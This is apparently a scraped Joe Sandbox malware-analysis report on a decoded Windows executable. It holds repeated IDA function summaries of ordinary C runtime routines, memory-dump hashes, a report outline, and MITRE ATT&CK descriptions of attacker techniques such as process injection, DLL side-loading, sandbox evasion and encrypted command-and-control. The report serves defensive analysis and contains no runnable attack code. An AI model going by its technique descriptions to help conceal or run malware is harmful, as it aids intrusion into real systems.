_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00EFA695
Unknown error, xrefs: 00EFA640

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: c27dc237151a72e94e5d5a258ed647316675aa235ab71232018723bab6d64e72
Instruction ID: 6b98c3bb7ab33bdf3f0b47184f85e8c94d06d070380aa7384ca2c94083956308
Opcode Fuzzy Hash: c27dc237151a72e94e5d5a258ed647316675aa235ab71232018723bab6d64e72
Instruction Fuzzy Hash: 4911C574504609EBDB00EF55E48899DBFF0FF88350F528488E8C8AB355CB35E9A4DB56

Function 00EFA62E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00EFA6A0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00EFA695
Total loss of significance (TLOSS), xrefs: 00EFA62E

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: d79c1295f89a633a58e2ccc43cafe6ecacd34a67ef52a4241a51ea9d62dafbe8
Instruction ID: ab03d63eab146ee0b6d9d3095759f3a02400e821d2ee78e2530c701ca8077f80
Opcode Fuzzy Hash: d79c1295f89a633a58e2ccc43cafe6ecacd34a67ef52a4241a51ea9d62dafbe8
Instruction Fuzzy Hash: B1019274904A09EBDB00DF45E48899DBFF0FF88344F528488E8C86B296CB35D9B4DB52

Function 00EFA625 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00EFA6A0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00EFA695
Partial loss of significance (PLOSS), xrefs: 00EFA625

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 80e5e4e542d8d16ecc8aab90809474b0b9eb5db8956d51bc3d84df7b5625ab5c
Instruction ID: b2220ecb3ae1ac7a5a0b8a216a68bed7713528e464fcbce06b172a7b2141b348
Opcode Fuzzy Hash: 80e5e4e542d8d16ecc8aab90809474b0b9eb5db8956d51bc3d84df7b5625ab5c
Instruction Fuzzy Hash: 3D019274904A09EBDB00DF45E08899DBFF0FF88344F528488E8C86B296CB35D9B4DB52

Function 00EFA637 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00EFA6A0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00EFA695
The result is too small to be represented (UNDERFLOW), xrefs: 00EFA637

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 0cc054fb29da6a625bd1ba9c8fc8bf6bc4dc9f4e97f315a6f7a48896ad4a6f3c
Instruction ID: 382615dc53cb7f21bdfe2e0fb9df68815f7b5fb95b47cb3ceb36114632255e0d
Opcode Fuzzy Hash: 0cc054fb29da6a625bd1ba9c8fc8bf6bc4dc9f4e97f315a6f7a48896ad4a6f3c
Instruction Fuzzy Hash: 10019274904A09EBDB00DF45E08899DBFF0FF88344F528488E8C86B296CB75D9B4DB52

Function 00EFA60A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00EFA6A0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00EFA695
Argument domain error (DOMAIN), xrefs: 00EFA60A

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 7b728922b01d8630b2c5596ed974249c386cbd37a976cf13bd04e7eee0b2aac6
Instruction ID: c8b17d6731a2f911e84799b88455faa6557c53e4528c2f1edcddd66e85da9ae2
Opcode Fuzzy Hash: 7b728922b01d8630b2c5596ed974249c386cbd37a976cf13bd04e7eee0b2aac6
Instruction Fuzzy Hash: 28019274904A09EBDB00DF45E08899DBFF0FF88354F528488E8C86B25ACB35D9B4DB52

Function 00EFA61C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00EFA6A0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00EFA695
Overflow range error (OVERFLOW), xrefs: 00EFA61C

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 2937cc81757473e6dcbc3944c5440f09a7f75b1fb7ecb6051f36e988ecdc0c2c
Instruction ID: bb93bbb0fd1bf7f0c1faa65f774d98e067bf00a8b40d15d5aa3cbece37d3eef5
Opcode Fuzzy Hash: 2937cc81757473e6dcbc3944c5440f09a7f75b1fb7ecb6051f36e988ecdc0c2c
Instruction Fuzzy Hash: 63019274904A09EBDB00DF45E08899DBFF0FF88344F528488E8C86B296CB35D9B4DB52

Function 00EFA613 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00EFA6A0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00EFA695
Argument singularity (SIGN), xrefs: 00EFA613

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: f74d474e6cdf922584b42ef4021e73d054d881ab6a5dfe11c5f60ed9440cfddb
Instruction ID: 71ae34d4af751e65847ac36f6dcf22a5b674acfbd6aad7de7f202ad1ee9f1931
Opcode Fuzzy Hash: f74d474e6cdf922584b42ef4021e73d054d881ab6a5dfe11c5f60ed9440cfddb
Instruction Fuzzy Hash: 1D019274904A09EBDB00DF45E08899DBFF0FF88344F528488E8C86B256CB35D9B4DB52

Function 00F025A4 Relevance: 5.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00F02602
free.MSVCRT ref: 00F0261A
free.MSVCRT ref: 00F02632
memset.MSVCRT ref: 00F0264D

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: free$memset
String ID:
API String ID: 2717317152-0
Opcode ID: 1b32eb604eaa46abadf8cd78cea66da4e6f4d9e963d029525c123901af9b158a
Instruction ID: c836ff375029f5d23c1881e5a66cbf3e6b40ccaaba60251218b407358e939b9f
Opcode Fuzzy Hash: 1b32eb604eaa46abadf8cd78cea66da4e6f4d9e963d029525c123901af9b158a
Instruction Fuzzy Hash: 6E31A9746043099FDB40EF69D984A997BE5BF08390F458568F888CB792DB34E940FF91

Function 00EE14B1 Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00EE14C4
strlen.MSVCRT ref: 00EE14F1
malloc.MSVCRT ref: 00EE1512
memcpy.MSVCRT ref: 00EE1549

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 0df883d8f804be8603d09f79e5027836c1e691306ccb3d88e202735976b77b69
Instruction ID: 0ece1606827cc3e1f4c5d3e74a028312bcf7e89893c76548c4b14d43ba56bdcb
Opcode Fuzzy Hash: 0df883d8f804be8603d09f79e5027836c1e691306ccb3d88e202735976b77b69
Instruction Fuzzy Hash: E6216BB4A0460A9FDF00DF99D881B9EB7F0FF49308F048858E555AB351E734AA44DF91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Windows Analysis Report
1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Function 00F016A0 Relevance: 12.1, APIs: 8, Instructions: 139
COMMON

Function 00EE1148 Relevance: 7.6, APIs: 5, Instructions: 146
COMMON

Function 00EE1189 Relevance: 7.6, APIs: 5, Instructions: 111
COMMON

Function 00EE1207 Relevance: 7.6, APIs: 5, Instructions: 105
COMMON

Function 00EE9CAD Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 553
synchronizationCOMMON

Function 00EF587C Relevance: 3.5, APIs: 2, Instructions: 540
sleepCOMMON

Function 00EE79AA Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 296
COMMON

Function 00EE6D2D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 143
COMMON

Function 00EF47C7 Relevance: 7.6, APIs: 5, Instructions: 92
COMMON

Function 00EF49FE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166
processCOMMON

Function 00EE1BBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
memoryCOMMON

Function 00F03841 Relevance: 4.6, APIs: 3, Instructions: 111
COMMON

Function 00F01729 Relevance: 3.8, APIs: 3, Instructions: 47
COMMON

Function 00F030F4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76
COMMON

Function 00EF65BC Relevance: 3.3, APIs: 2, Instructions: 316
sleepCOMMON